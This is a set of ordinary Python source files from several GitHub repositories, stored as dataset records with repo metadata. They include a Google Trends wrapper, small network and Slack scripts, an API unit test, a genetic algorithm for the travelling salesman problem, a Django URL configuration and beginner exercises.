pandas.Dataframe\n self.interest_over_time_df = self.interest_over_time_df.iloc[:, :self.keyword.__len__()] # 안쓰는 데이터 isPartial 제거\n self.interest_over_time_list = self.interest_over_time_df_to_list()\n return self.interest_over_time_list\n\n # Interest Over Time hourly\n def historical_hourly_interest(self):\n self.historical_hourly_interest_df = self.pytrend.get_historical_interest(keywords=self.keyword, year_start=2019, month_start=4, day_start=1, hour_start=0, year_end=2019, month_end=5, day_end=1, hour_end=0, cat=0, geo='KR', gprop='', sleep=0) # Returns pandas.Dataframe\n self.historical_hourly_interest_df = self.historical_hourly_interest_df.iloc[:, :self.keyword.__len__()] # 안쓰는 데이터 isPartial 제거\n self.historical_hourly_interest_list = self.historical_hourly_interest_df_to_list()\n return self.historical_hourly_interest_list\n\n # Interest by Region\n def interest_by_region(self): # 지역별로 검색 비율을 알려준다\n self.interest_by_region_df = self.pytrend.interest_by_region()\n self.interest_by_region_list = self.interest_by_region_df_to_list()\n return self.interest_by_region_list\n\n # Related Topics, Returns dictionary of pandas.DataFrames\n def related_topics(self): # 키워드 관련 토픽을 순위별로 알려준다\n self.related_topics_dict = self.pytrend.related_topics()\n return self.related_topics_dict\n\n # Related Queries, returns a dictionary of dataframes\n def related_queries(self): # 키워드 관련 검색어를 순위별로 알려준다\n self.related_queries_dict = self.pytrend.related_queries()\n return self.related_queries_dict\n\n # trending searches in real time\n def trending_searches(self): # 현재 시간대 인기검색어 순위 20까지 보여준다\n self.trending_searches_df = self.pytrend.trending_searches(pn='south_korea')\n return self.trending_searches_df\n\n #\n def today_searches(self): #\n self.today_searches_df = self.pytrend.today_searches()\n return self.today_searches_df\n\n # Get Google Top Charts\n def top_charts(self): # 년 단위로 상위 핫 키워드 가져오기\n self.top_charts_df = self.pytrend.top_charts(date=2015, hl='ko', tz='82', geo='KR') # date = YYYY integer, tz='82', geo='KR', geo='GLOBAL', geo='US'\n return self.top_charts_df\n\n # Get Google Category\n def categories(self): # 구글 카테고리 종류와 id를 보여준다\n self.categories_df = self.pytrend.categories()\n return self.categories_df\n\n def show_interest_over_time(self): # 시간에 따른 검색 비율을 그래프로 보여준다\n num = 0.0\n plt.figure(figsize=(14, 4))\n plt.style.use('ggplot') # 더 이쁘게 그려준다\n for key in self.keyword:\n num += 0.1\n plt.plot(self.interest_over_time_df[key], c=plt.cm.rainbow(num), label=key)\n plt.legend(bbox_to_anchor=(1, 1), loc=2) # 라벨의 위치를 정해준다\n plt.show()\n\n def interest_over_time_df_to_list(self): # interest_over_time_df의 데이터프레임 타입의 데이터를 리스트 타입으로 변환\n date = self.interest_over_time_df.index.tolist()\n for i in range(len(date)):\n date[i] = date[i].date().strftime(\"%Y-%m-%d\")\n date.insert(0, 'x')\n data = []\n data.append(date)\n for key in self.keyword:\n y = self.interest_over_time_df[key].tolist()\n y.insert(0, key)\n data.append(y)\n return data\n\n def historical_hourly_interest_df_to_list(self): # historical_hourly_interest_df의 데이터프레임 타입의 데이터를 리스트 타입으로 변환\n date = self.historical_hourly_interest_df.index.tolist()\n for i in range(len(date)):\n date[i] = date[i].date().strftime(\"%Y-%m-%d\")\n date.insert(0, 'x')\n data = []\n data.append(date)\n for key in self.keyword:\n y = self.historical_hourly_interest_df[key].tolist()\n y.insert(0, key)\n data.append(y)\n return data\n\n def interest_by_region_df_to_list(self): # interest_by_region_df의 데이터프레임 타입의 데이터를 리스트 타입으로 변환\n region = self.interest_by_region_df.index.tolist()\n data = []\n for key in self.keyword:\n y = self.interest_by_region_df[key].tolist()\n ratio = 0\n for i in [0, 1, 2, 3, 8, 11, 12, 13, 14, 15]:\n ratio += y[i]\n ratio /= 100\n tmp_val = 0\n reg_name = ''\n if ratio > 0:\n for i in range(len(region)):\n if i in [1, 2, 14, 11, 0, 13]:\n if i == 0:\n tmp_val = round(y[i] / ratio)\n reg_name = '강원도'\n elif i == 1:\n tmp_val = round((y[i] + y[i + 1]) / ratio)\n reg_name = '서울/경기'\n elif i == 2:\n tmp_val = round((y[i] + y[i + 1]) / ratio)\n reg_name = '경상도'\n elif i == 11:\n tmp_val = round((y[i] + y[i + 1]) / ratio)\n reg_name = '전라도'\n elif i == 13:\n tmp_val = round(y[i] / ratio)\n reg_name = '제주도'\n elif i == 14:\n tmp_val = round((y[i] + y[i + 1]) / ratio)\n reg_name = '충청도'\n data.append([reg_name, tmp_val])\n return data\n\n def search_rate_by_gender(self):\n gender_data = []\n gender_data.append(['male', random.randint(50, 100)])\n gender_data.append(['female', random.randint(50, 100)])\n return gender_data\n\n","repo_name":"spark-1/tread","sub_path":"treadweb/collector/googleTrend.py","file_name":"googleTrend.py","file_ext":"py","file_size_in_byte":8391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25946126349","text":"#!/usr/bin/python3\n\"\"\"\nscript that takes in a URL, sends a request to the URL and\ndisplays the value of the X-Request-Id variable found\nin the header of the response.\n\"\"\"\nimport sys\nfrom urllib import request, parse\n\n\nif __name__ == \"__main__\":\n data = parse.urlencode({'email': sys.argv[2]})\n data = data.encode('utf-8')\n req = request.Request(sys.argv[1], data)\n with request.urlopen(req) as response:\n print(response.read().decode())\n","repo_name":"tomasgvgt/holbertonschool-higher_level_programming","sub_path":"0x11-python-network_1/2-post_email.py","file_name":"2-post_email.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"2811421568","text":"import requests\nfrom case import login214\nimport unittest\nfrom common import logger\n\nclass element_Search(unittest.TestCase):\n log=logger.Log()\n def setUp(self):\n\n s = requests.session()\n self.s = s\n self.login=login214.Login(s).login()\n\n\n def test_search(self):\n self.log.info('开始测试')\n url2 = \"http://192.168.0.241:8080/device/search\"\n datas = {\"pageNumber\": \"1\",\n \"pageSize\": \"10\",\n \"keywords\": \"\"}\n head2 = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36\",\n \"Content-Type\": \"application/x-www-form-urlencoded;charset=UTF-8\"}\n self.log.info('登录成功')\n\n r2 = self.s.post(url=url2, data=datas, headers=head2, allow_redirects=False)\n self.log.info('设备接口响应')\n self.assertEqual(200,r2.status_code)\n self.log.info('响应结果:' + str(r2.status_code))\n data=r2.json()\n self.assertEqual(0,data['total'])\n self.log.info('设备总数:'+str(data['total']))\n\nif __name__ == '__main__':\n\n unittest.main()","repo_name":"zyn520/20180118","sub_path":"case/test_ele_serch.py","file_name":"test_ele_serch.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34228727810","text":"import copy\nimport random\nimport time\n\nfrom read_data import Read_data\nfrom sys import maxsize\n\n\nclass GeneticAlgorithm:\n def __init__(self, nodes, max_time):\n self.mutation_rate = 0\n self.crossing_rate = 0\n self.nodes = nodes\n self.population_size = 20\n self.size = len(nodes)\n self.population = []\n self.best_cost = maxsize\n self.deadline = max_time\n self.nodes = nodes\n self.size = len(nodes)\n\n def check_data_init(self):\n if self.deadline == 0:\n self.deadline = 100\n if self.mutation_rate == 0:\n self.mutation_rate = 0.1\n if self.crossing_rate == 0:\n self.crossing_rate = 0.8\n\n def find_solution(self):\n self.check_data_init()\n total_time = 0\n find_time = 0\n duration = 0\n self.population = self.generate_population()\n while (duration < self.deadline):\n duration = time.process_time()\n for i in range(0, self.population_size):\n for j in range(0, self.population_size):\n P1 = self.population[i][0]\n P2 = self.population[j][0]\n if P1 is not P2:\n rand = random.random()\n if rand < self.crossing_rate:\n child = self.PMX(P1, P2)\n child_cost = self.calculate_cost(child)\n # jeśli najlepszy\n if child_cost < self.best_cost:\n self.best_cost = child_cost\n self.best_path = child\n\n self.population.append([child, child_cost])\n\n self.population.sort(key=self.myFunc)\n help_list = []\n for k in range(0, self.population_size):\n help_list.append(self.population[k])\n self.population = help_list\n\n #rand = random.random()\n #if rand < self.mutation_rate:\n # self.population[i][0] = self.mutation_by_inversion(self.population[i][0])\n # self.population[i][1] = self.calculate_cost()\n\n return self.best_path, self.best_cost\n\n def myFunc(self, e):\n return e[1]\n\n def generate_population(self):\n help_list = []\n for i in range(self.population_size):\n path = random.sample(range(self.size), self.size)\n cost = self.calculate_cost(path)\n help_list.append([path, cost])\n help_list.sort(key=self.myFunc)\n return help_list\n\n def calculate_cost(self, path):\n cost = 0\n for i in range(1, len(path)):\n cost += self.nodes[path[i - 1]][path[i]]\n cost += self.nodes[path[len(self.nodes) - 1]][path[0]]\n return cost\n\n def PMX(self, P1, P2):\n\n point1 = random.randint(0, self.size - 2)\n child = []\n for i in range(0, self.size):\n child.append(-1)\n\n point2 = random.randint(point1 + 1, self.size - 1)\n\n for i in range(self.size):\n if i >= point1 and i < point2:\n child[i] = P1[i]\n\n for k in range(point1, point2):\n if P2[k] not in child:\n a = P2[k]\n b = P2[k]\n while True:\n j = P1[k]\n index = P2.index(j)\n if child[index] == -1:\n child[index] = b\n break\n else:\n a = j\n k = P2.index(a)\n for i in range(self.size):\n if child[i] == -1:\n child[i] = P2[i]\n return child\n\n def mutation_by_inversion(self, P):\n point1 = random.randint(0, self.size - 2)\n point2 = random.randint(point1 + 1, self.size - 1)\n slice = P[point1:point2 + 1]\n slice = slice[::-1]\n child = copy.deepcopy(P)\n child[point1:point2 + 1] = slice\n\n\nrd = Read_data()\n# file_name = input(\"Podaj nazwe pliku: \")\nfile_name = 'ftv47.atsp'\ntry:\n open(format(file_name), \"r\")\n nodes = rd.read_file(file_name)\n# print(nodes)\nexcept IOError:\n print(\"Error!\")\n\ngn = GeneticAlgorithm(nodes, 120)\n# P1 = [5,9,6,3,2,1,0,8,4,7]\n# P2 = [5,8,0,1,4,9,2,6,3,7]\n# P1 = [4, 9, 2, 8, 3, 6, 5, 7, 0, 1]\n# P2 = [0, 9, 5, 7, 1, 8, 3, 4, 2, 6]\n# print(gn.PMX(P1, P2))\na, b = gn.find_solution()\nprint(a)\nprint(b)\n","repo_name":"adrianmalecki/PEA3","sub_path":"genetic_algorithm.py","file_name":"genetic_algorithm.py","file_ext":"py","file_size_in_byte":4466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22652288691","text":"\"\"\"\nURL configuration for softdesk project.\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom projects.views import (\n ProjectViewSet,\n ContributorViewSet,\n CommentViewSet,\n IssueViewSet,\n)\nfrom rest_framework.routers import SimpleRouter\nfrom rest_framework_nested import routers\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n)\nfrom users.views import UserViewSet, RegisterViewSet\n\nrouter = SimpleRouter()\nrouter.register(\"users\", UserViewSet, basename=\"users\")\nrouter.register(\"projects\", ProjectViewSet, basename=\"projects\")\n\ncontributors_router = routers.NestedSimpleRouter(router, r\"projects\", lookup=\"project\")\ncontributors_router.register(\n \"contributors\", ContributorViewSet, basename=\"contributors\"\n)\n\nissues_router = routers.NestedSimpleRouter(router, r\"projects\", lookup=\"project\")\nissues_router.register(\"issues\", IssueViewSet, basename=\"issues\")\n\ncomments_router = routers.NestedSimpleRouter(issues_router, r\"issues\", lookup=\"issue\")\ncomments_router.register(\"comments\", CommentViewSet, basename=\"comments\")\n\nurlpatterns = [\n path(\"admin/\", admin.site.urls),\n path(\"api-auth/\", include(\"rest_framework.urls\")),\n path(\"\", include(router.urls)),\n path(\"\", include(contributors_router.urls)),\n path(\"\", include(issues_router.urls)),\n path(\"\", include(comments_router.urls)),\n path(\"login/\", TokenObtainPairView.as_view(), name=\"login\"),\n path(\"token/refresh/\", TokenRefreshView.as_view(), name=\"token_refresh\"),\n path(\"signup/\", RegisterViewSet.as_view({\"post\": \"create\"}), name=\"signup\"),\n path(\n \"projects//subscription/\",\n ProjectViewSet.as_view({\"post\": \"project_subscription\"}),\n ),\n path(\n \"users//delete_all_data/\",\n UserViewSet.as_view({\"delete\": \"delete_all_data\"}),\n ),\n]\n","repo_name":"Jogodev/SoftDesk","sub_path":"softdesk/softdesk/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33679238738","text":"\nimport typing\nfrom collections import OrderedDict\nimport re\n\n\n\n\n# from pydantic import BaseModel\n# from pydantic.dataclasses import dataclass, Field\n\n# @dataclass\n# class Users():\n# id: int = Field('id serial int primary key')\n# name: str = Field('varchar(45)')\n\n# class Config:\n# orm_mode = True\n\ns = \"\"\"\n class BigUser(User):\n name = Field(\"int\")\n age = Field(\"int\");zaz = Field(\"int\")\n zzz = Field(\"int\")\n profession\\\n = Field('varchar(255)')\n\n bnb = Field(\"int\")\n\n\n\"\"\"\n\n_fields_ = {\n 'age': 23,\n 'bnb': 23,\n 'name': 'fds',\n 'profession': 'Teacher',\n 'zaz': 34,\n 'zzz': 234,\n}\n\ndef get_match_index(k, v):\n m = re.search(f\"(;|^)[\\\\s]*\\\\b{k}\\\\s*=\", s, re.M)\n if m:\n return m.start()\n return 0\n\nres = get_match_index('zaz', 34)\nprint(res)\n\n# def get_ordered_fields(fields, cls_def):\n# new_fields = OrderedDict()\n# for k, v in\n","repo_name":"neurobin/python-morm","sub_path":"tests/testd.py","file_name":"testd.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"11697446443","text":"# API info: https://pypi.org/project/slackclient/\n# pip install slackclient\nfrom slackclient import SlackClient\nimport argparse\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Push Notificator with Slack by Mario Parren~o. Msc student Universidad Politecnica de Valencia maparla@inf.upv.es . Enjoy!')\n parser.add_argument('--slack_token', type=str, required=True, help='The message to send.')\n parser.add_argument('--msg', type=str, required=True, help='The message to send.')\n parser.add_argument('--channel', type=str, default='log_ai', help='The slack channel where we send the message.')\n aux=parser.parse_args()\n arguments=list()\n arguments=[aux.slack_token, aux.msg, aux.channel]\n return arguments\n\nslack_token, msg, channel = parse_args()\n\ndef slack_message(slack_token, message, channel):\n token = slack_token\n sc = SlackClient(token)\n sc.api_call('chat.postMessage', channel=channel, \n text=message, username='My Sweet Bot',\n icon_emoji=':robot_face:')\n\nslack_message(slack_token, msg, channel)\n\n","repo_name":"MarioProjects/Python-Slack-Logging","sub_path":"slack_sender.py","file_name":"slack_sender.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"9992941392","text":"import pytest\nfrom datetime import date, timedelta\nfrom calendars import CalendarStub\nfrom tasks import Task, TaskList\n\n\ndef test_creation():\n # Arrange\n today = date(2000, 1, 1)\n calendar = CalendarStub(today)\n\n # Act\n sut = TaskList(calendar)\n\n # Assert\n assert 0 == len(sut)\n assert [] == sut.due_tasks\n assert [] == sut.overdue_tasks\n assert [] == sut.finished_tasks\n\n\ndef test_adding_task_with_due_day_in_future():\n # Arrange\n today = date(2000, 1, 1)\n tomorrow = today + timedelta(days=1)\n calendar = CalendarStub(today)\n task = Task('description', tomorrow)\n sut = TaskList(calendar)\n\n # Act\n sut.add_task(task)\n\n # Assert\n assert 1 == len(sut)\n assert [task] == sut.due_tasks\n\n\ndef test_adding_task_with_due_day_in_past():\n # Arrange\n today = date(2000, 1, 1)\n yesterday = today - timedelta(days=1)\n calendar = CalendarStub(today)\n task = Task('description', yesterday)\n sut = TaskList(calendar)\n\n # Act/Assert\n with pytest.raises(RuntimeError):\n sut.add_task(task)\n assert 0 == len(sut)\n\n\ndef test_task_becomes_overdue():\n # Arrange\n today = date(2000, 1, 1)\n tomorrow = today + timedelta(days=1)\n next_week = today + timedelta(weeks=1)\n calendar = CalendarStub(today)\n task = Task('description', tomorrow)\n sut = TaskList(calendar)\n sut.add_task(task)\n\n # Act\n calendar.today = next_week\n\n # Assert\n assert [task] == sut.overdue_tasks\n\n\ndef test_task_becomes_finished():\n # Arrange\n today = date(2000, 1, 1)\n tomorrow = today + timedelta(days=1)\n calendar = CalendarStub(today)\n task = Task('description', tomorrow)\n sut = TaskList(calendar)\n sut.add_task(task)\n\n # Act\n task.finished = True\n\n # Assert\n assert [] == sut.due_tasks\n assert [task] == sut.finished_tasks\n","repo_name":"UCLL-PR2/exercises","sub_path":"06-testing/09-arrange-act-assert/solution/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"29699800696","text":"# 문제 - 사용자에게 문장 1개를 입력받아서, 출력해주세요.\n\n# print(\"\"\"문장하나를 입력해주세요 : \"\"\", end = \" \") input 안에 문자열 입력 가능\nfrom re import A\n\n\nl = input(\"이름 입력해주세요 : \")\nprint(l)\n\n# 응용 - 초등학생 수준의 수학문제\n\nwhile True:\n a = input('1더하기 1은? : ')\n \n if a != '2':\n print('{}님, 혹시 미취학 아동이신가요?'.format(l))\n continue\n else:\n print('정답')\n break","repo_name":"kingssik/Practice_Python","sub_path":"Quiz_input_1.py","file_name":"Quiz_input_1.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27106503504","text":"from tkinter import *\r\n\r\njanela = Tk()\r\n\r\ntitulo = Label(\r\n text = 'Minha primeira interface gráfica',\r\n fg = 'red',\r\n bg = 'black'\r\n)\r\n\r\nnome = Label(text = 'Escreva seu nome')\r\n\r\nentrada = Entry(background='red', fg='black')\r\n\r\ndef limpar():\r\n entrada.delete(0, END)\r\n\r\ndef imprimir_saudacao():\r\n print(f'''\r\n Olá, seja bem-vindo\r\n {entrada.get()}!\r\n ''')\r\n limpar()\r\n\r\nenviar = Button(text='Enviar', fg='red', bg='black', width=50, command=imprimir_saudacao)\r\n\r\n\r\ntitulo.pack(pady=100)\r\nnome.pack(side='left')\r\nentrada.pack(side='right')\r\nenviar.pack(side='bottom')\r\n\r\njanela.mainloop()","repo_name":"pspellegrini/infinityschool","sub_path":"Py/Aula 09 - Tkinter/tkinter_2.py","file_name":"tkinter_2.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28164585585","text":"#Asks for the user's name\ninputName = input(\"Who\\'s birthday is it?\\t\")\n\ndef birthday_song(usedName):\n #Prints out the song using the name\n song = f\"Happy birthday to you!\\nHappy birthday to you!\\nHappy birthday dear {usedName}!\\nHappy birthday to you!\"\n print(song)\n\n#Uses the inputted name from the beginning\nbirthday_song(inputName)","repo_name":"roagan796/Principles-of-CS-Period-1","sub_path":"Wolf_3.02.py","file_name":"Wolf_3.02.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}